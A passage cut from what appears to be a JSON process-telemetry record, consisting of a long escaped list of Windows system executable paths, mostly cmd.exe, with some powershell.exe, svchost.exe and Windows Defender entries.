\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\appidcertstorecheck.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\usoclient.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\compattelrunner.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\appidcertstorecheck.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\usoclient.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\